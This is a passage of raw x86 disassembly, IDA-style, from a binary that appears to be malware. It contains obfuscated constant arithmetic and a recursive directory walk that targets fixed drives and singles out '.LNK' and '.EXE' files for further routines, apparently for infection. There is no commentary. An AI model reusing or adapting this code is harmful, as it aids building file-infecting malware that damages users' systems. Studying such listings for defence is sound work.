cmp ds:dword_447130[edi*4], 0
jz short loc_43EAAE
inc [ebp+var_10058]
loc_43EA9C: ; CODE XREF: sub_43E5EA+49A�j
mov eax, dword_44C20C
add eax, 3E2h
cmp [ebp+var_10058], eax
jb short loc_43EA86
loc_43EAAE: ; CODE XREF: sub_43E5EA+4AA�j
mov edi, [ebp+var_10058]
mov esi, [ebp+var_10060]
mov ds:dword_446060[edi*4], esi
mov eax, edi
mov dl, [ebp+var_10059]
mov ds:byte_448200[eax], dl
movsx eax, word_44C100
sub eax, 3
cmp [ebp+var_10080], eax
jbe loc_43EB83
movsx esi, word_44C0B0
add esi, 0FFF8h
mov ds:word_448A50[edi*2], si
mov eax, dword_44C204
dec eax
mov [ebp+var_10088], eax
jmp short loc_43EB66
; ---------------------------------------------------------------------------
loc_43EB09: ; CODE XREF: sub_43E5EA+595�j
mov edi, [ebp+var_10088]
mov esi, edi
shl esi, 2
cmp ds:dword_447130[esi], 0
jz short loc_43EB60
movzx edx, ds:word_448A50[edi*2]
mov ecx, dword_44C284
add ecx, 0FFF6h
cmp edx, ecx
jz short loc_43EB60
mov edx, [ebp+var_10060]
cmp ds:dword_446060[esi], edx
jnz short loc_43EB60
mov dl, ds:byte_448200[edi]
cmp dl, [ebp+var_10059]
jnz short loc_43EB60
lea edi, ds:448A50h[edi*2]
inc word ptr [edi]
jmp short loc_43EB9A
; ---------------------------------------------------------------------------
loc_43EB60: ; CODE XREF: sub_43E5EA+532�j
; sub_43E5EA+54A�j ...
inc [ebp+var_10088]
loc_43EB66: ; CODE XREF: sub_43E5EA+51D�j
mov eax, dword_44C1F4
add eax, 3DEh
movsx edx, word_44C230
add eax, edx
cmp [ebp+var_10088], eax
jb short loc_43EB09
jmp short loc_43EB9A
; ---------------------------------------------------------------------------
loc_43EB83: ; CODE XREF: sub_43E5EA+4F6�j
mov edi, [ebp+var_10058]
mov esi, dword_44C284
sub esi, 8
mov ds:word_448A50[edi*2], si
loc_43EB9A: ; CODE XREF: sub_43E5EA+574�j
; sub_43E5EA+597�j
call ds:dword_44B770 ; GetTickCount
mov edi, [ebp+var_10058]
mov ds:dword_44A660[edi*4], eax
lea esi, off_44C354
mov ds:dword_447130[edi*4], esi
mov edi, [ebp+var_10058]
lea edi, ds:447130h[edi*4]
mov [ebp+var_10084], edi
mov eax, edi
push eax
mov esi, [eax]
call dword ptr [esi+4]
mov [ebp+var_10078], 9
mov edi, [ebp+var_10058]
lea edi, ds:447130h[edi*4]
mov [ebp+var_10070], edi
lea esi, [ebp+var_10078]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_1007C]
push edi
mov edi, [edi]
call dword ptr [edi+0A4h]
mov ebx, eax
inc [ebp+var_10058]
lea eax, [ebp+var_10078]
push eax
call ds:dword_44BBB0
mov eax, [ebp+var_1007C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43EC33: ; CODE XREF: sub_43E5EA+158�j
; sub_43E5EA+165�j ...
cmp [ebp+var_10048], 0
jz short loc_43EC48
mov eax, [ebp+var_10048]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43EC48: ; CODE XREF: sub_43E5EA+650�j
cmp [ebp+var_4], 0
jz short loc_43EC57
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43EC57: ; CODE XREF: sub_43E5EA+11B�j
; sub_43E5EA+662�j
inc [ebp+var_1C]
loc_43EC5A: ; CODE XREF: sub_43E5EA+CD�j
mov eax, [ebp+var_28]
cmp [ebp+var_1C], eax
jb loc_43E6BC
loc_43EC66: ; CODE XREF: sub_43E5EA+B6�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43EC6F: ; CODE XREF: sub_43E5EA+8E�j
mov eax, [ebp+var_2C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
loc_43EC7A: ; CODE XREF: sub_43E5EA+5F�j
; sub_43E5EA+1E6�j
pop edi
pop esi
pop ebx
leave
retn
sub_43E5EA endp
; =============== S U B R O U T I N E =======================================
sub_43EC7F proc near ; DATA XREF: .data:0044C380�o
mov eax, 80004001h
retn 8
sub_43EC7F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43EC87 proc near ; CODE XREF: sub_442F46+346�p
; sub_442F46+440�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov edi, dword_44C1CC
sub edi, 6
cmp edx, edi
jnz short loc_43ECAB
mov eax, [ebp+arg_0]
jmp short loc_43ECC5
; ---------------------------------------------------------------------------
loc_43ECAB: ; CODE XREF: sub_43EC87+1D�j
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov [ebp+var_8], eax
mov edi, eax
mul esi
mov [ebp+var_C], eax
mov edi, eax
add edi, esi
mov [ebp+var_4], edi
mov eax, edi
loc_43ECC5: ; CODE XREF: sub_43EC87+22�j
pop edi
pop esi
leave
retn
sub_43EC87 endp
; =============== S U B R O U T I N E =======================================
sub_43ECC9 proc near ; CODE XREF: sub_442511+259�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov ecx, esi
mov eax, dword_44C154
movsx edx, word_44C098
add eax, edx
sub eax, 2
cmp ecx, eax
jge short loc_43ED1F
mov eax, dword_44C0C4
movsx edx, word_44C1F0
add eax, edx
sub eax, 5
imul ecx, eax
mov eax, dword_44C09C
sub eax, 4
mov edx, esi
add edx, eax
movsx eax, word_44C27C
add eax, dword_44C15C
sub eax, 9
imul edx, eax
sub ecx, edx
jmp loc_43EE5C
; ---------------------------------------------------------------------------
loc_43ED1F: ; CODE XREF: sub_43ECC9+1A�j
dec ecx
mov eax, dword_44C09C
add eax, 0Eh
add eax, dword_44C0AC
cmp ecx, eax
jge short loc_43ED5F
movsx eax, word_44C1E0
add eax, dword_44C0AC
sub eax, 2
imul ecx, eax
mov eax, ecx
sub eax, esi
mov edx, dword_44C1BC
inc edx
add edx, dword_44C1A0
mov ecx, eax
sub ecx, edx
jmp loc_43EE5C
; ---------------------------------------------------------------------------
loc_43ED5F: ; CODE XREF: sub_43ECC9+67�j
dec ecx
movsx eax, word_44C0E0
mov edx, dword_44C14C
lea eax, [eax+edx+1Bh]
cmp ecx, eax
jge short loc_43ED97
movsx eax, word_44C0A4
add eax, dword_44C234
sub eax, 7
imul ecx, eax
mov eax, dword_44C158
add eax, 39h
sub ecx, eax
jmp loc_43EE5C
; ---------------------------------------------------------------------------
loc_43ED97: ; CODE XREF: sub_43ECC9+AA�j
dec ecx
mov eax, dword_44C154
add eax, 1Dh
cmp ecx, eax
jge short loc_43EDC4
movsx eax, word_44C16C
inc eax
imul ecx, eax
mov eax, dword_44C0C4
add eax, 39h
add eax, dword_44C0D4
sub ecx, eax
jmp loc_43EE5C
; ---------------------------------------------------------------------------
loc_43EDC4: ; CODE XREF: sub_43ECC9+D9�j
dec ecx
movsx eax, word_44C1E0
mov edx, dword_44C0B4
lea eax, [eax+edx+21h]
cmp ecx, eax
jge short loc_43EE02
movsx eax, word_44C264
add eax, dword_44C114
sub eax, 0Fh
imul ecx, eax
movsx eax, word_44C174
mov edx, dword_44C138
lea eax, [eax+edx+4Dh]
sub ecx, eax
jmp short loc_43EE5C
; ---------------------------------------------------------------------------
loc_43EE02: ; CODE XREF: sub_43ECC9+10F�j
dec ecx
mov eax, dword_44C1EC
add eax, 2Eh
cmp ecx, eax
jge short loc_43EE28
mov eax, dword_44C10C
sub eax, 4
imul ecx, eax
movsx eax, word_44C0B0
add eax, 63h
sub ecx, eax
jmp short loc_43EE5C
; ---------------------------------------------------------------------------
loc_43EE28: ; CODE XREF: sub_43ECC9+144�j
dec ecx
mov eax, dword_44C198
add eax, 37h
cmp ecx, eax
jge short loc_43EE4C
mov eax, dword_44C11C
sub eax, 3
imul ecx, eax
mov eax, dword_44C17C
add eax, 6Bh
sub ecx, eax
jmp short loc_43EE5C
; ---------------------------------------------------------------------------
loc_43EE4C: ; CODE XREF: sub_43ECC9+16A�j
mov eax, dword_44C18C
add eax, 34h
add eax, dword_44C120
sub ecx, eax
loc_43EE5C: ; CODE XREF: sub_43ECC9+51�j
; sub_43ECC9+91�j ...
mov eax, ecx
pop esi
retn
sub_43ECC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43EE60 proc near ; DATA XREF: .data:0044C3A0�o
push ebp
mov ebp, esp
movsx eax, word_44C1C0
sub eax, 4
cmp ds:dword_448608, eax
jbe short loc_43EE80
push offset dword_448608
call ds:dword_446010 ; InterlockedDecrement
loc_43EE80: ; CODE XREF: sub_43EE60+13�j
mov eax, ds:dword_448608
pop ebp
retn 4
sub_43EE60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43EE89 proc near ; DATA XREF: .data:0044C36C�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_10]
mov word ptr [ebp+arg_10], ax
movsx eax, word_44C22C
add eax, 3
cmp ds:dword_448620, eax
jnb short loc_43EEB9
mov eax, dword_44C258
sub eax, 2
mov ds:dword_448620, eax
loc_43EEB9: ; CODE XREF: sub_43EE89+21�j
mov eax, dword_44C280
mov edi, eax
add edi, dword_44C210
sub edi, 5
jmp short loc_43EED7
; ---------------------------------------------------------------------------
loc_43EECB: ; CODE XREF: sub_43EE89+5A�j
lea ebx, ds:447130h[edi*4]
cmp esi, ebx
jz short loc_43EEE5
inc edi
loc_43EED7: ; CODE XREF: sub_43EE89+40�j
mov eax, dword_44C0F4
add eax, 3E1h
cmp edi, eax
jb short loc_43EECB
loc_43EEE5: ; CODE XREF: sub_43EE89+4B�j
mov eax, dword_44C094
add eax, 3DCh
movsx edx, word_44C230
add eax, edx
cmp edi, eax
jnz short loc_43EF03
xor eax, eax
jmp loc_43F051
; ---------------------------------------------------------------------------
loc_43EF03: ; CODE XREF: sub_43EE89+71�j
movzx esi, ds:word_448A50[edi*2]
mov ebx, dword_44C0AC
movsx edx, word_44C27C
add ebx, edx
sub ebx, 4
cmp esi, ebx
jnz short loc_43EF48
movzx eax, ds:byte_448200[edi]
push eax
push ds:dword_446060[edi*4]
call sub_44443E
add esp, 8
and ds:dword_447130[edi*4], 0
xor eax, eax
jmp loc_43F051
; ---------------------------------------------------------------------------
loc_43EF48: ; CODE XREF: sub_43EE89+96�j
movzx esi, ds:word_448A50[edi*2]
mov ebx, dword_44C15C
add ebx, 0FFF6h
cmp esi, ebx
jnz loc_43F02F
mov eax, dword_44C110
movsx edx, word_44C0D8
add eax, edx
sub eax, 7
mov [ebp+var_4], eax
jmp loc_43F018
; ---------------------------------------------------------------------------
loc_43EF7D: ; CODE XREF: sub_43EE89+19C�j
mov esi, [ebp+var_4]
mov ebx, esi
shl ebx, 2
cmp ds:dword_447130[ebx], 0
jz loc_43F015
movzx edx, ds:word_448A50[esi*2]
movsx ecx, word_44C0C0
add ecx, 0FFFDh
cmp edx, ecx
jz short loc_43F015
mov edx, ds:dword_446060[edi*4]
cmp ds:dword_446060[ebx], edx
jnz short loc_43F015
mov bl, ds:byte_448200[esi]
cmp bl, ds:byte_448200[edi]
jnz short loc_43F015
movzx esi, ds:word_448A50[esi*2]
mov ebx, dword_44C09C
sub ebx, 4
cmp esi, ebx
jnz short loc_43F006
mov esi, [ebp+var_4]
movzx ebx, ds:byte_448200[esi]
push ebx
push ds:dword_446060[esi*4]
call sub_44443E
add esp, 8
and ds:dword_447130[edi*4], 0
jmp short loc_43F02B
; ---------------------------------------------------------------------------
loc_43F006: ; CODE XREF: sub_43EE89+156�j
mov esi, [ebp+var_4]
lea esi, ds:448A50h[esi*2]
dec word ptr [esi]
jmp short loc_43F02B
; ---------------------------------------------------------------------------
loc_43F015: ; CODE XREF: sub_43EE89+104�j
; sub_43EE89+121�j ...
inc [ebp+var_4]
loc_43F018: ; CODE XREF: sub_43EE89+EF�j
mov eax, dword_44C28C
add eax, 3E2h
cmp [ebp+var_4], eax
jb loc_43EF7D
loc_43F02B: ; CODE XREF: sub_43EE89+17B�j
; sub_43EE89+18A�j
xor eax, eax
jmp short loc_43F051
; ---------------------------------------------------------------------------
loc_43F02F: ; CODE XREF: sub_43EE89+D5�j
movzx esi, ds:word_448A50[edi*2]
mov ebx, dword_44C274
add ebx, dword_44C18C
cmp esi, ebx
jle short loc_43F04F
dec ds:word_448A50[edi*2]
loc_43F04F: ; CODE XREF: sub_43EE89+1BC�j
xor eax, eax
loc_43F051: ; CODE XREF: sub_43EE89+75�j
; sub_43EE89+BA�j ...
pop edi
pop esi
pop ebx
leave
retn 24h
sub_43EE89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F058 proc near ; CODE XREF: sub_43D523+B8�p
; sub_43D622+1CD�p ...
var_EF38 = dword ptr -0EF38h
var_EF34 = dword ptr -0EF34h
var_EF30 = dword ptr -0EF30h
var_EF2C = byte ptr -0EF2Ch
var_EF2B = byte ptr -0EF2Bh
var_EE2C = dword ptr -0EE2Ch
var_EE24 = byte ptr -0EE24h
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
mov eax, 0EF38h
call sub_444F6C
push ebx
push esi
push edi
mov edi, dword_44C288
movsx esi, word_44C160
add edi, esi
imul edi, 3C0h
sub edi, 12C0h
movsx esi, word_44C1C0
lea edi, [edi+esi+0EA5Ch]
shl edi, 1
mov [ebp+var_EF38], edi
push edi
call sub_444EF1
add esp, 4
mov [ebp+var_EE2C], eax
movzx eax, [ebp+arg_0]
mov edx, dword_44C200
add edx, dword_44C0A0
sub edx, 8
cmp eax, edx
jnz short loc_43F0E2
push offset asc_44D171 ; "\a"
call sub_43E507
add esp, 4
push eax
lea edi, [ebp+var_EE24]
push edi
call ds:dword_44B634
add esp, 8
jmp loc_43F1F0
; ---------------------------------------------------------------------------
loc_43F0E2: ; CODE XREF: sub_43F058+65�j
call ds:dword_449228
mov ebx, eax
mov [ebp+var_EF2C], bl
movzx eax, [ebp+arg_0]
mov edx, dword_44C164
add edx, dword_44C0C4
sub edx, 9
cmp eax, edx
jnz short loc_43F15F
mov eax, dword_44C0F0
add eax, 6
add eax, dword_44C18C
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push [ebp+arg_8]
call sub_442AF2
add esp, 0Ch
push offset asc_44D141 ; ","
call sub_43E507
add esp, 4
movzx edi, [ebp+var_EF2C]
push edi
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call ds:dword_44B634
add esp, 10h
jmp loc_43F1F0
; ---------------------------------------------------------------------------
loc_43F15F: ; CODE XREF: sub_43F058+AD�j
mov eax, dword_44C194
sub eax, 9
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push dword_44C370
call sub_442AF2
add esp, 0Ch
push offset a_ ; "_"
call sub_43E507
add esp, 4
mov edi, [ebp+arg_18]
mov esi, [ebp+arg_8]
mov ebx, edi
add ebx, esi
push ebx
movsx ebx, word_44C1DC
movsx edx, word_44C170
add ebx, edx
dec ebx
push ebx
push [ebp+arg_1C]
push edi
push [ebp+arg_14]
movzx edi, [ebp+var_EF2C]
push edi
mov edi, esi
sub edi, [ebp+arg_C]
movsx esi, word_44C104
sub esi, 4
sub edi, esi
push edi
push offset dword_449230
push [ebp+arg_10]
push [ebp+arg_20]
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call ds:dword_44B634
add esp, 34h
loc_43F1F0: ; CODE XREF: sub_43F058+85�j
; sub_43F058+102�j
push [ebp+var_EF38]
push [ebp+var_EE2C]
movsx eax, word_44C130
movsx edx, word_44C16C
add eax, edx
sub eax, 3
neg eax
push eax
lea eax, [ebp+var_EE24]
push eax
mov eax, dword_44C21C
sub eax, 8
push eax
push 0
call ds:dword_44B640 ; MultiByteToWideChar
push offset asc_44D0C4 ; "\t"
call sub_441767
add esp, 4
push eax
call ds:dword_446044
mov [ebp+var_EF30], eax
push [ebp+var_EE2C]
call ds:dword_446044
mov [ebp+var_EF34], eax
push eax
push [ebp+var_EF30]
mov eax, [ebp+arg_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+104h]
push [ebp+var_EF34]
call ds:dword_44BBA0
push [ebp+var_EF30]
call ds:dword_44BBA0
lea esp, [ebp-0EF44h]
pop edi
pop esi
pop ebx
leave
retn
sub_43F058 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F28C proc near ; CODE XREF: sub_43CBE3+B6�p
; sub_43CBE3+ED�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 2Bh
mov edx, 2FA0BE83h
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
mov ebx, edi
mov [ebp+arg_0], bl
movzx eax, [ebp+arg_0]
mov edx, dword_44C280
sub edx, 4
cmp eax, edx
jnz short loc_43F2CA
mov eax, 65h
jmp loc_43F353
; ---------------------------------------------------------------------------
loc_43F2CA: ; CODE XREF: sub_43F28C+32�j
movzx eax, [ebp+arg_0]
movsx edx, word_44C0CC
sub edx, 6
cmp eax, edx
jnz short loc_43F2E3
mov eax, 79h
jmp short loc_43F353
; ---------------------------------------------------------------------------
loc_43F2E3: ; CODE XREF: sub_43F28C+4E�j
movzx eax, [ebp+arg_0]
mov edx, dword_44C20C
add edx, dword_44C120
sub edx, 9
cmp eax, edx
jnz short loc_43F301
mov eax, 75h
jmp short loc_43F353
; ---------------------------------------------------------------------------
loc_43F301: ; CODE XREF: sub_43F28C+6C�j
movzx eax, [ebp+arg_0]
mov edx, dword_44C1E4
add edx, dword_44C274
sub edx, 2
cmp eax, edx
jnz short loc_43F31F
mov eax, 69h
jmp short loc_43F353
; ---------------------------------------------------------------------------
loc_43F31F: ; CODE XREF: sub_43F28C+8A�j
movzx eax, [ebp+arg_0]
mov edx, dword_44C28C
add edx, dword_44C25C
sub edx, 0Ah
cmp eax, edx
jnz short loc_43F33D
mov eax, 6Fh
jmp short loc_43F353
; ---------------------------------------------------------------------------
loc_43F33D: ; CODE XREF: sub_43F28C+A8�j
movzx eax, [ebp+arg_0]
mov edx, dword_44C154
sub edx, 2
cmp eax, edx
jnz short loc_43F353
mov eax, 61h
loc_43F353: ; CODE XREF: sub_43F28C+39�j
; sub_43F28C+55�j ...
pop edi
pop ebx
leave
retn
sub_43F28C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F357 proc near ; CODE XREF: sub_43B63B+3E�p
; sub_43F357+2D8�p ...
var_252 = byte ptr -252h
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
cmp [ebp+arg_8], 0
jz short loc_43F385
mov eax, dword_44C1E8
add eax, dword_44C0B8
sub eax, 4
mov [ebp+var_248], eax
jmp loc_43F415
; ---------------------------------------------------------------------------
loc_43F385: ; CODE XREF: sub_43F357+13�j
mov edx, [ebp+arg_4]
mov ecx, dword_44C1C4
add ecx, dword_44C1CC
sub ecx, 0Bh
cmp ds:dword_448630[edx*4], ecx
jnz short loc_43F3B6
push ebx
call ds:dword_44860C ; FindClose
mov eax, dword_44C1B8
sub eax, 4
push eax
call ds:dword_44B664 ; ExitThread
loc_43F3B6: ; CODE XREF: sub_43F357+47�j
mov eax, dword_44C154
add eax, 5Dh
add eax, dword_44C18C
mov [ebp+var_248], eax
push offset byte_44D0B9
call sub_43E507
push [ebp+arg_4]
push eax
lea edx, [ebp+var_252]
push edx
call ds:dword_44B634
add esp, 10h
lea eax, [ebp+var_252]
push eax
call ds:dword_44B668 ; GetDriveTypeA
cmp eax, 3
jnz short loc_43F415
movsx eax, word_44C22C
movsx edx, word_44C144
lea eax, [eax+edx+11Fh]
mov [ebp+var_248], eax
loc_43F415: ; CODE XREF: sub_43F357+29�j
; sub_43F357+A1�j
xor edi, edi
inc edi
push offset word_44D0B2
call sub_43E507
push esi
push eax
lea edx, [ebp+var_242]
push edx
call ds:dword_44B634
add esp, 10h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43F439: ; CODE XREF: sub_43F357+E7�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F439
movsx ecx, word_44C1DC
add ecx, 4
mov edx, eax
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_43F4EF
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43F45D: ; CODE XREF: sub_43F357+10B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F45D
mov ecx, dword_44C128
sub ecx, 5
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_446030
add esp, 4
cmp eax, 4Ch
jnz short loc_43F4EF
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43F489: ; CODE XREF: sub_43F357+137�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F489
mov edx, eax
mov ecx, dword_44C248
movsx eax, word_44C0BC
add ecx, eax
sub ecx, 6
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_446030
add esp, 4
cmp eax, 4Eh
jnz short loc_43F4EF
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43F4BE: ; CODE XREF: sub_43F357+16C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F4BE
movsx ecx, word_44C150
sub ecx, 6
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_446030
add esp, 4
cmp eax, 4Bh
jnz short loc_43F4EF
push esi
call sub_43DD90
add esp, 4
loc_43F4EF: ; CODE XREF: sub_43F357+FB�j
; sub_43F357+12B�j ...
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43F4F4: ; CODE XREF: sub_43F357+1A2�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F4F4
movsx ecx, word_44C0BC
add ecx, dword_44C1F4
sub ecx, 8
mov edx, eax
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_43F5C2
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43F51E: ; CODE XREF: sub_43F357+1CC�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F51E
movsx ecx, word_44C0CC
add ecx, dword_44C1B0
sub ecx, 0Ah
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_446030
add esp, 4
cmp eax, 45h
jnz short loc_43F5C2
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43F551: ; CODE XREF: sub_43F357+1FF�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F551
mov ecx, dword_44C278
add ecx, dword_44C20C
sub ecx, 5
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_446030
add esp, 4
cmp eax, 58h
jnz short loc_43F5C2
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43F583: ; CODE XREF: sub_43F357+231�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F583
mov edx, eax
mov ecx, dword_44C134
movsx eax, word_44C250
add ecx, eax
sub ecx, 7
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_446030
add esp, 4
cmp eax, 45h
jnz short loc_43F5C2
push [ebp+var_248]
push esi
call sub_44229C
add esp, 8
loc_43F5C2: ; CODE XREF: sub_43F357+1BC�j
; sub_43F357+1F3�j ...
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call ds:dword_449258 ; FindFirstFileA
mov ebx, eax
movsx eax, word_44C22C
movsx edx, word_44C104
add eax, edx
sub eax, 0Eh
neg eax
cmp ebx, eax
jz loc_43F6AC
cmp [ebp+var_112], 2Eh
jz loc_43F6A8
push offset byte_44D0A9
call sub_43E507
lea edx, [ebp+var_112]
push edx
push esi
push eax
lea edx, [ebp+var_242]
push edx
call ds:dword_44B634
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_43F357
add esp, 20h
jmp short loc_43F6A8
; ---------------------------------------------------------------------------
loc_43F639: ; CODE XREF: sub_43F357+353�j
lea eax, [ebp+var_13E]
push eax
push ebx
call ds:dword_447004 ; FindNextFileA
mov edi, eax
or edi, edi
jnz short loc_43F66A
mov eax, [ebp+var_248]
add eax, ds:dword_44B638
push eax
call ds:dword_44B630
pop ecx
push ebx
call ds:dword_44860C ; FindClose
jmp short loc_43F6AC
; ---------------------------------------------------------------------------
loc_43F66A: ; CODE XREF: sub_43F357+2F4�j
cmp [ebp+var_112], 2Eh
jz short loc_43F6A8
push offset dword_44D0A0
call sub_43E507
lea edx, [ebp+var_112]
push edx
push esi
push eax
lea edx, [ebp+var_242]
push edx
call ds:dword_44B634
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_43F357
add esp, 20h
loc_43F6A8: ; CODE XREF: sub_43F357+2A5�j
; sub_43F357+2E0�j ...
or edi, edi
jnz short loc_43F639
loc_43F6AC: ; CODE XREF: sub_43F357+298�j
; sub_43F357+311�j
pop edi
pop esi
pop ebx
leave
retn
sub_43F357 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F6B1 proc near ; CODE XREF: sub_440C0A+2F3�p
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
mov eax, dword_44C23C
sub eax, 5
mov [ebp+var_4], eax
jmp short loc_43F6DD
; ---------------------------------------------------------------------------
loc_43F6C7: ; CODE XREF: sub_43F6B1+40�j
mov eax, 30h
mul [ebp+var_4]
mov [ebp+var_20], eax
and ds:dword_449370[eax], 0
inc [ebp+var_4]
loc_43F6DD: ; CODE XREF: sub_43F6B1+14�j
movsx eax, word_44C264
mov edx, dword_44C0A0
lea eax, [eax+edx+57h]
cmp [ebp+var_4], eax
jb short loc_43F6C7
push 0
call ds:dword_4480D0
push offset dword_44C394
push offset dword_44DAB8
push 7
push 0
push offset dword_44D9F8
call ds:dword_448624
mov ebx, eax
mov eax, dword_44C11C
sub eax, 5
cmp ebx, eax
jnz loc_43F8D9
lea eax, [ebp+var_C]
push eax
mov eax, dword_44C394
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
mov eax, dword_44C190
sub eax, 2
cmp ebx, eax
jnz short loc_43F759
mov eax, dword_44C10C
movsx edx, word_44C208
add eax, edx
sub eax, 0Bh
cmp [ebp+var_C], eax
jnz short loc_43F75E
loc_43F759: ; CODE XREF: sub_43F6B1+90�j
jmp loc_43F869
; ---------------------------------------------------------------------------
loc_43F75E: ; CODE XREF: sub_43F6B1+A6�j
mov eax, dword_44C1D4
movsx edx, word_44C130
add eax, edx
sub eax, 5
mov [ebp+var_8], eax
jmp loc_43F85D
; ---------------------------------------------------------------------------
loc_43F777: ; CODE XREF: sub_43F6B1+1B2�j
mov [ebp+var_38], 3
mov eax, [ebp+var_8]
mov [ebp+var_30], eax
lea eax, [ebp+var_3C]
push eax
lea esi, [ebp+var_38]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, dword_44C394
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
movsx eax, word_44C144
add eax, dword_44C0A0
sub eax, 0Ah
cmp ebx, eax
jnz loc_43F85A
lea eax, [ebp+var_40]
push eax
push offset dword_44DAD8
mov eax, [ebp+var_3C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44C1D0
movsx edx, word_44C264
add eax, edx
sub eax, 10h
cmp ebx, eax
jnz short loc_43F851
lea eax, off_44C390
mov [ebp+var_24], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_44]
push eax
push offset dword_44DA18
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44C110
sub eax, 5
cmp ebx, eax
jnz short loc_43F83F
lea eax, [ebp+var_48]
push eax
push offset dword_44DA18
push [ebp+var_44]
push [ebp+var_40]
call sub_44163D
add esp, 10h
mov [ebp+var_4C], eax
mov eax, [ebp+var_44]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43F83F: ; CODE XREF: sub_43F6B1+169�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40]
push eax
mov esi, [eax]
call dword ptr [esi+8]
